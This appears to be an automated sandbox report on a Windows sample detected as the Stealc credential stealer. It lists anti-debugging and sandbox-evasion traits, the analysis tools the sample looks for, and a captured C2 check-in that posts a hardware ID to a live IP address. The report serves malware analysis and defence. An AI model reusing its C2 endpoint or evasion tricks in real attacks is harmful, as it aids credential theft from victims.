strcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002B16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002B16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_002D1BF0
              Source: file.exe, file.exe, 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ:
              Source: file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1780359810.00000000011F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@`"
              Source: file.exe, 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25869
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26005
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25851
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25998
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4A60 VirtualProtect 00000000,00000004,00000100,?0_2_002B4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D6390 mov eax, dword ptr fs:[00000030h]0_2_002D6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002D2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_002D4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_002D46A0
              Source: file.exe, file.exe, 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_002D2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_002D1B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002D2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_002D2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpUN100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/3file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpUNfile.exe, 00000000.00000002.1780359810.00000000011F2000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.php-file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/Jfile.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phpQfile.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1561772
                                Start date and time:2024-11-24 09:24:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 58s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 121
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadeyBrowse
                                • 185.215.113.43

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.946621712931782
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'762'304 bytes
                                MD5:cb78b3cf97d74f0540679225a564e8b0
                                SHA1:95b72e4eb9f28a6534e1d902f802f2988ad6735f
                                SHA256:3427282a0e679abf14880c48f47728c97e1c3f870d1bf3bc0116736f3abde675
                                SHA512:88f693df96058aa6f91ba582ce5c213e9c7761eeb1379b8993c4de83b106632083cd90bbd3eba98a4038b6b951adf81f7f64e7bab903eba431ee4497abd5cde6
                                SSDEEP:49152:K4sd0B4xleENLXG5uPufXJztveHofL1rAh:AOMl5NLXG5uPuRgof2h
                                TLSH:E58533A54CB3673BEDC12DB150CA43703FFF329216A9A35D1C4A183E4E532E558A7D2A
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0xa7f000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FF8A862806Ah
                                cmpps xmm3, dqword ptr [edx], 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007FF8A862A065h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [0700000Ah], al
                                or al, byte ptr [eax]
                                add byte ptr [ecx], al
                                or al, byte ptr [eax]
                                add byte ptr [edx], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax*4], cl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2490000x16200acdeff952dcac4f7a216279a0236fbe1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x24a0000x2b00x200a4121880cd8bee8db14ecb2b830b71f0False0.80078125data5.967797224871212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x24c0000x29d0000x2009313f633ed05c18bdbbecb812508ebf1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                hnbmjddz0x4e90000x1950000x1946009d292b575e0ca08a2f538d500fb50beaFalse0.9948681414219475data7.954657445334715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fhrijgtr0x67e0000x10000x4006dcf88bb3456eebd4ec4097bcbcec9f3False0.7041015625data5.594575094278972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x67f0000x30000x2200543e39079f113215197a14e3d847d212False0.09696691176470588DOS executable (COM)1.123406194589726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x67d2380x256ASCII text, with CRLF line terminators0.5100334448160535

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-24T09:25:06.783371+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 24, 2024 09:25:04.809037924 CET4973080192.168.2.4185.215.113.206
                                Nov 24, 2024 09:25:04.928554058 CET8049730185.215.113.206192.168.2.4
                                Nov 24, 2024 09:25:04.928680897 CET4973080192.168.2.4185.215.113.206
                                Nov 24, 2024 09:25:04.928905010 CET4973080192.168.2.4185.215.113.206
                                Nov 24, 2024 09:25:05.048367023 CET8049730185.215.113.206192.168.2.4
                                Nov 24, 2024 09:25:06.321801901 CET8049730185.215.113.206192.168.2.4
                                Nov 24, 2024 09:25:06.321902037 CET4973080192.168.2.4185.215.113.206
                                Nov 24, 2024 09:25:06.323982000 CET4973080192.168.2.4185.215.113.206
                                Nov 24, 2024 09:25:06.443484068 CET8049730185.215.113.206192.168.2.4
                                Nov 24, 2024 09:25:06.783309937 CET8049730185.215.113.206192.168.2.4
                                Nov 24, 2024 09:25:06.783370972 CET4973080192.168.2.4185.215.113.206
                                Nov 24, 2024 09:25:10.110070944 CET4973080192.168.2.4185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730185.215.113.206807516C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Nov 24, 2024 09:25:04.928905010 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 24, 2024 09:25:06.321801901 CET203INHTTP/1.1 200 OK
                                Date: Sun, 24 Nov 2024 08:25:06 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 24, 2024 09:25:06.323982000 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 41 36 39 45 39 46 39 38 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a
                                Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="hwid"D7A69E9F98841340093196------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build"mars------KFHJJJKKFHIDAAKFBFBF--
                                Nov 24, 2024 09:25:06.783309937 CET210INHTTP/1.1 200 OK
                                Date: Sun, 24 Nov 2024 08:25:06 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:03:25:00
                                Start date:24/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x2b0000
                                File size:1'762'304 bytes
                                MD5 hash:CB78B3CF97D74F0540679225A564E8B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
